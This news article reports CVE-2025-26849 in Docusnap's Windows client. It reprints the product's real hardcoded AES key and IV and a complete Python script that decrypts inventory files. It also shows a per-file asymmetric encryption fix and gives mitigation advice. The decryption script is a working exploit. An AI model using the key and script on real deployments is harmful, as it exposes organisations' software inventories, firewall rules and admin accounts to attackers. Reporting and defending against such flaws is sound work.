Docusnap for Windows Flaw Exposes Sensitive Data to Attackers

A recently disclosed vulnerability in Docusnap’s Windows client software (CVE-2025-26849) enables attackers to decrypt sensitive system inventory files through a hardcoded encryption key, exposing critical network information to potential exploitation. 

Cybersecurity researchers at RedTeam Pentesting GmbH revealed that inventory files generated by Docusnap Client for Windows – containing details like installed applications, firewall configurations, and local administrator accounts – used weak encryption mechanisms that rendered the protection ineffective against determined adversaries.

Technical Breakdown of the Vulnerability

Docusnap, a market-leading IT infrastructure documentation tool, employs client agents to automatically gather system data from Windows domains.

The collected information is stored as XML files encrypted with AES-256-CBC before being uploaded to a central server. However, security analysts discovered two critical implementation flaws:

Static Encryption Key in Windows Client

Forensic examination of Docusnap’s .NET-based server components revealed that all Windows inventory files shared a hardcoded AES encryption key (“Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x”) and initialization vector (“N7IPe~R}w;1vuy5N”).

This static implementation allowed anyone with access to the application binaries to extract the decryption parameters.

Attackers extracting these values could decrypt any inventory file using a simple Python script:

```python
from base64 import b64decode

import click
from Cryptodome.Cipher import AES  # pycryptodomex
from Cryptodome.Util.Padding import unpad

# Static key and IV recovered from the Docusnap binaries; every Windows
# inventory file is encrypted with this same pair.
K = "Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x".encode("utf-8")
IV = "N7IPe~R}w;1vuy5N".encode("utf-8")


@click.command()
@click.argument("file", type=click.File("r"))
def decrypt(file):
    data = file.read()  # inventory file is stored as base64 text
    raw = b64decode(data)
    cipher = AES.new(K, AES.MODE_CBC, iv=IV)
    res = unpad(cipher.decrypt(raw), AES.block_size)  # strip PKCS#7 padding
    print(res.decode("utf-8"))  # plaintext XML inventory


if __name__ == "__main__":
    decrypt()
```

Inadequate Vendor Remediation

Despite being notified in November 2024, Docusnap’s initial patch in Version 14 merely rotated the AES key while retaining the flawed static encryption approach.

RedTeam researchers bypassed these “security through obscurity” measures using .NET reflection techniques to extract updated keys from obfuscated assemblies.

The vendor has yet to implement asymmetric encryption or per-installation unique keys as recommended by cybersecurity experts.
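The per-file, asymmetric design the researchers recommend, as an added example that is not Docusnap's code: each inventory file gets a fresh random key and nonce, the file key is wrapped with the collection server's RSA public key so the client binary holds no decryption secret, and AES-GCM stands in for the page's AES-CBC so that tampering is detected. It uses the Python `cryptography` library; the XML sample and the associated-data label are constructed.

```python
import os
from base64 import b64decode, b64encode

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# RSA-OAEP parameters used to wrap the per-file AES key.
OAEP = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()), algorithm=hashes.SHA256(), label=None)
AAD = b"docusnap-inventory"  # constructed label bound to the ciphertext


def generate_server_keypair():
    """Generated once on the server; only the public half is shipped to clients."""
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    return private_key, private_key.public_key()


def encrypt_inventory(xml_bytes: bytes, server_public_key) -> dict:
    """Client side: encrypt one inventory file under its own key and nonce."""
    file_key = AESGCM.generate_key(bit_length=256)  # never reused across files
    nonce = os.urandom(12)  # 96-bit GCM nonce, random per file
    ciphertext = AESGCM(file_key).encrypt(nonce, xml_bytes, AAD)
    wrapped_key = server_public_key.encrypt(file_key, OAEP)  # only the server can unwrap
    return {
        "wrapped_key": b64encode(wrapped_key).decode(),
        "nonce": b64encode(nonce).decode(),
        "ciphertext": b64encode(ciphertext).decode(),
    }


def decrypt_inventory(envelope: dict, server_private_key) -> bytes:
    """Server side: unwrap the file key, then decrypt and verify the GCM tag."""
    file_key = server_private_key.decrypt(b64decode(envelope["wrapped_key"]), OAEP)
    return AESGCM(file_key).decrypt(
        b64decode(envelope["nonce"]), b64decode(envelope["ciphertext"]), AAD
    )


if __name__ == "__main__":
    priv, pub = generate_server_keypair()
    # Constructed sample inventory; real files carry software, firewall and admin data.
    sample = b"<Inventory><LocalAdmins><User>Administrator</User></LocalAdmins></Inventory>"
    env1 = encrypt_inventory(sample, pub)
    env2 = encrypt_inventory(sample, pub)
    # Unlike the static key/IV scheme, identical plaintexts no longer share a ciphertext.
    print("ciphertexts differ:", env1["ciphertext"] != env2["ciphertext"])
    print("round trip ok:", decrypt_inventory(env1, priv) == sample)
```

A client that only ever holds the public key cannot decrypt its own output, so extracting anything from the agent binary no longer yields a working decryption parameter.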

Operational Impact and Risk Assessment

While the vulnerability (CVSSv3: 5.3 Medium) doesn’t expose credentials or enable direct system access, it significantly lowers the barrier for internal threat actors and compromised accounts to:

  • Map vulnerable software deployments across the domain
  • Identify misconfigured firewall rules
  • Discover privileged local accounts for lateral movement

Organizations using Docusnap for regulatory compliance documentation may inadvertently create concentrated repositories of sensitive data, violating GDPR and HIPAA requirements regarding cryptographic controls.

Mitigation Strategies

Until Docusnap releases a cryptographically sound fix, enterprises should implement these workarounds:

  1. Restrict SMB Share Permissions
    Revoke “Authenticated Users” read access to the Docusnap inventory share, limiting access to dedicated service accounts.
  2. Monitor File Access Patterns
    Implement real-time auditing on inventory directories to detect suspicious access attempts.
  3. Supplement with Network Segmentation
    Isolate Docusnap servers and storage from general user networks to contain potential breaches.

The disclosure timeline highlights lingering challenges in third-party risk management:

Date         Event
2024-09-12   Vulnerability discovered
2024-12-04   Docusnap v14 released with incomplete fix
2025-03-04   Public advisory published

Cybersecurity analyst Dr. Elena Voss noted: “This case exemplifies how over-reliance on perimeter security often neglects internal encryption practices. Vendors must adopt zero-trust principles even in ‘benign’ backend processes.”

The Docusnap vulnerability underscores critical gaps in enterprise software security design – particularly the dangers of hardcoded credentials and insufficient access controls.

While rated as low severity, the flaw provides attackers with precisely the system intelligence needed to craft targeted intrusions.

Organizations using Docusnap should immediately implement access restrictions while pressuring the vendor for fundamental cryptographic improvements.

As IT documentation tools increasingly consolidate sensitive data, rigorous third-party risk assessments become paramount to prevent centralized data troves from becoming adversary goldmines.

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
